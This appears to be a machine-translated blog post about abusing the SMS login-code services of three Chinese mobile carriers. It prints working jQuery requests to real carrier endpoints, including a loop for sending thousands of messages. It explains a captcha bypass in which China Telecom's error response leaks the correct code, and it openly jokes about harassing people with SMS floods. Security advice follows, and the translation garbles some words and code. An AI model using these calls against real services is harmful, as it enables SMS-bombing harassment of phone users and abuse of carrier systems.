You can call the text message random code sending service on the websites of the three major mobile operators at will.

I used text message verification codes for my website over the past two days. I suddenly remembered that when I log on to the websites of the three mobile carriers, some text messages generated random codes, and then I entered random codes on the mobile phone to log on. After analysis, we found that the mobile phone random text messages of the three carriers were all requested through Ajax, and they were randomly sent by third parties.ProgramAutomatic Call. Let's take a look at it one by one.

First, China Unicom's website:

URL: http://www.10010.com/

The logon page is as follows:

Click in to get the random password of the corresponding user number and send it to the user's mobile phone via text message. I checked the client script through the chrome console and found that there is no limit on the number and time, as long as it is the mobile phone number of China Unicom. So I used jquery to call AjaxCodeThe snippet is as follows. If you are interested, you can use this code to send SMS harassment messages to users who do not like China Unicom. (I will not write the phone number, huh, huh)

 
1:$. Ajax ({
 

 
2:Cache:False,
 

 
3:Type:"Get",
 

4:URL:Http://www.10010.com/login/sendRadomPassword.action",
 

 
5:Data:"Mobile = 132 ********"
 

 
6:});
 

The above example is always a request. If you have to add a time limit, it can be 10 thousand or 1 million times. For example:

 
1: VaRSendtimes = 1000;
 

 
2: While(Sendtimes> 0 ){
 

3:$. Ajax ({
 

 
4:Cache:False,
 

 
5:Type:"Get",
 

 
6:URL:Http://www.10010.com/login/sendRadomPassword.action",
 

 
7:Data:"Mobile = 132 ********"
 

 
8:});
 

9:Sendtimes --;
 

 
10:}
 

Next it's China Mobile's turn:

China Mobile home site: http://www.bj.10086.cn

The login screen is as follows:

The text message code can be obtained once a minute. I checked the client code and found that she not only has this restriction, but also has many server-side restrictions and returns the status code. I sorted the status code as follows:

Statecode	Description
OK	The random text message password has been sent successfully. Please check it!
Limit	Up to three random text messages can be sent every two minutes. Please try again later!
Errornum	An error occurred while entering the additional code. Please try again!
Errormobile	Incorrect mobile phone number. Please use Beijing mobile number to log on!
Denyservice	You are not authorized to use the membership service of Beijing mobile!
Deny	You are not authorized to use the membership service of Beijing mobile!
Errtime	The SMS password can be obtained only once per minute
Errcount	Obtain up to 10 SMS passwords per day
Others	Failed to send. Please try again!

The level of programmers who help mobile websites is still good. So many states have been designed, which means it is not a beginner. The code for calling is as follows:

 
1: VaRMobile ="152 ********";
 

2:$. Post ("Http://www.bj.10086.cn/passport/SendTmpNum? Wwwreq = false & mobile ="+ Mobile +"& Logintype = 2 & rnum = & backurl =");
 

Although it is restricted and cannot be sent in batches, it is good that you can send a few text messages to someone at intervals in the middle of the night, and the other party does not know how to send a random code to themselves, haha.

China Telecom:

Next, let's talk about China Telecom, which has done quite well, but is very mentally retarded. Let's look at my analysis.

Login page address: http://bj.ct10000.com/login

What he has done is that a random password text message can be successfully sent only when a correct verification code is required. The call method is as follows:

 
1:$. Ajax ({
 

 
2:Cache:False,
 

3:Type:"Get",
 

 
4:URL:Http://bj.ct10000.com/login/fetchMessage.action",
 

 
5:Data:"Custauthenticatein. queryvalue = 189 ********* & randcode = sa3r"
 

 
6:});
 

The above URL requires the mobile phone number and image verification code in the data. because we do not know the verification code on the image, it cannot be called successfully, however, the telecom website programmer provides us with great help, because when the verification code is incorrect, he will also return a lot of data for us. The following is when the verification code is incorrect, the returned JSON string:

 
{
 

 
"About_menu": 0,
 

 
"Custauthenticatein":{
 

 
"Areacode":Null,
 

 
"Contactid":Null,
 

 
"Password":Null,
 

 
"Pwdtype":Null,
 

"Querytype":Null,"Queryvalue":"189 ********","Serialid":Null,"Systemid":Null
 

 
},
 

 
"Defaultlogintype": 0,
 

 
"Defaultpwdtype": 0,
 

 
"Info":Null,
 

"Logintypemap":Null,
 

 
"PS":Null,
 

 
"Psshop":Null,
 

 
"Pwdtypemap":Null,
 

 
"Randcode":"Sa3r",
 

 
"Retinfo":Null,
 

"Tip":"Incorrect verification code",
 

 
"Validatecode":Null
 

 
}
 

The randcode above is the fake verification code we just created, and validatecode is the correct Verification Code stored on the server. The validatecode above is null, because we have not requested the verification code image. If we write another request and request the image path of the Verification Code, validatecode is not empty.

Telecommunications Verification Code image path for http://bj.ct10000.com/authImg? Type = 0. I will request this address in the address bar. Of course you can use js to request this address. Then we will use the above Ajax request to send the verification code, and the following output will be obtained:

 
{
 

 
"About_menu": 0,
 

 
"Custauthenticatein":{
 

"Areacode":Null,
 

 
"Contactid":Null,
 

 
"Password":Null,
 

 
"Pwdtype":Null,
 

 
"Querytype":Null,
 

 
"Queryvalue":"189 ********",
 

"Serialid":Null,
 

 
"Systemid":Null
 

 
},
 

 
"Defaultlogintype": 0,
 

 
"Defaultpwdtype": 0,
 

 
"Info":Null,
 

 
"Logintypemap":Null,
 

"PS":Null,
 

 
"Psshop":Null,
 

 
"Pwdtypemap":Null,
 

 
"Randcode":"Sa3r",
 

 
"Retinfo":Null,
 

 
"Tip":"Incorrect verification code",
 

"Validatecode":"G9dr"
 

 
};
 

The above response has already told me validatecode = g9dr. This is the text above the verification code I just requested. In this case, I have obtained the correct verification code, correct the above Ajax request data. Please loop the request multiple times. It seems that there is no limit on the number and time. If you have to add a limit on the number of times, I think it is 10 thousand times. Well, just use the Random Code of China Telecom.

Summary:

1. China Unicom's text message random code service address, without any restrictions, is obviously incorrect.

2. Mobile uses server restrictions. For the same client, there are many restrictions and I clauses and clear status code.

3. The idea of China Telecom is good. First, the image verification code is used to prevent robots from sending requests. However, when the image verification code is incorrect, you should not return the correct verification code to the client.

  

My suggestions:

1. The client code is very insecure. Even if the current jquery class library makes the client more powerful and richer, it is not believed, with Chrome's consloe, you can modify the data and space on the webpage at will. This requires that the client cannot store sensitive information, and the server is fully responsible for all necessary verification of the client and re-verification on the server.

2. restrict cross-origin access. Although skilled programmers have cross-origin access solutions, they can at least limit them.

3. The server should impose restrictions on services such as email verification and text message sending on a single client, such as mobile solutions and telecommunications verification codes.

4. Encryption obfuscated client JS Code (or dynamic loading), making it difficult for others to understand your program and viewing web requests on the Web page to get your call method.

5. Use ciphertext.

Among the above suggestions, the most reliable is the server side, of course, it is best to manage 5. We will discuss more and better suggestions.

Okay, that's it. Don't take this.ArticleThe code in is used to harass others (I am not opposed to using programs to harass false certificates !). We just need to learn some experience and lessons.